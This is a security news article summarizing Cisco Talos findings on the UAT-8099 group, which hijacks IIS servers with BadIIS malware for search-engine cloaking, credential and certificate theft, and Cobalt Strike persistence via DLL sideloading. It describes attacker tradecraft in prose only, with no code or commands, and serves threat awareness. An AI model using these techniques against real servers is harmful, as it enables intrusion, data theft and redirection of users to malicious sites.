Search with a Catch: How One Click on Google Can Hand Your Server to Hackers
Major organizations worldwide have already fallen victim to this sophisticated scheme.
Major organizations worldwide have already fallen victim to this sophisticated scheme.
The hacker group UAT-8099 is currently running an active campaign to promote malicious content in search engine results by compromising Microsoft IIS servers in various countries. Researchers from Cisco Talos have discovered that members of this Chinese-language group combine search engine spam with the theft of sensitive data—from configuration files to SSL certificates. The victims include universities, telecom companies, and technology organizations in India, Thailand, Vietnam, Canada, and Brazil.
To achieve their goal, the attackers select authoritative yet vulnerable IIS servers, where they deploy web shells and the BadIIS malware, which masks their activity and replaces web page content. They use publicly available tools for privilege escalation, after which they deploy the FRP reverse proxy, SoftEther VPN, and the EasyTier utility to the server. They then activate the Guest account with administrative privileges, enable remote access via RDP, and create a hidden user with permanent administrator rights.
After establishing control over the system, UAT-8099 members proceed to analyze files: they review logs, configurations, stored credentials, and certificates, including with the help of the "Everything" utility. The harvested information is archived using WinRAR and prepared for exfiltration from the server. To protect their own infrastructure, the attackers additionally install D_Safe_Manage—a legitimate tool that prevents interference from other threat actors.
The malicious logic implemented in the BadIIS component is of particular interest. It allows for the covert execution of redirects and the injection of malicious scripts, hidden from both users and search engines. Request processing depends on the values of the HTTP User-Agent and Referer headers. If a request comes from the Googlebot and contains keywords like "casino" or "bonus," it is proxied through.
However, if the request comes from a real user arriving from a search engine, a JavaScript code is injected. This code downloads a file from a C2 server and redirects the user to a fake website—typically one hosting illegal content or gambling advertisements.
Two distinct clusters of BadIIS samples were discovered in its new version. One is notable for its extremely low detection rate, while the other contains debug strings in Simplified Chinese. Both variants use the WriteEntityChunks API to embed content into the server's response, complicating network-level detection and evading traffic analysis systems. Simultaneously, they implement full-fledged logic for SEO manipulation: the malware feeds Google dozens of backlinks with HTML content that mimics authoritative pages. This allows the compromised sites to be promoted in search results.
For long-term persistence on a compromised server, the group employs DLL Sideloading and loads Cobalt Strike through the legitimate Windows component inetinfo.exe. The first stage of the loader is placed in wmicodegen.dll, and then, through a chain of decryption, several layers of payload are unpacked, including a custom loader and a beacon disguised as CDN and Exchange traffic.
According to experts, this hybrid attack, which combines malicious SEO optimization with credential theft, indicates a high level of preparation and a well-structured infrastructure. In each case, the attackers meticulously customize the environment, considering the target region's language, scanner signatures, and defense mechanisms, thereby reducing the likelihood of detection.
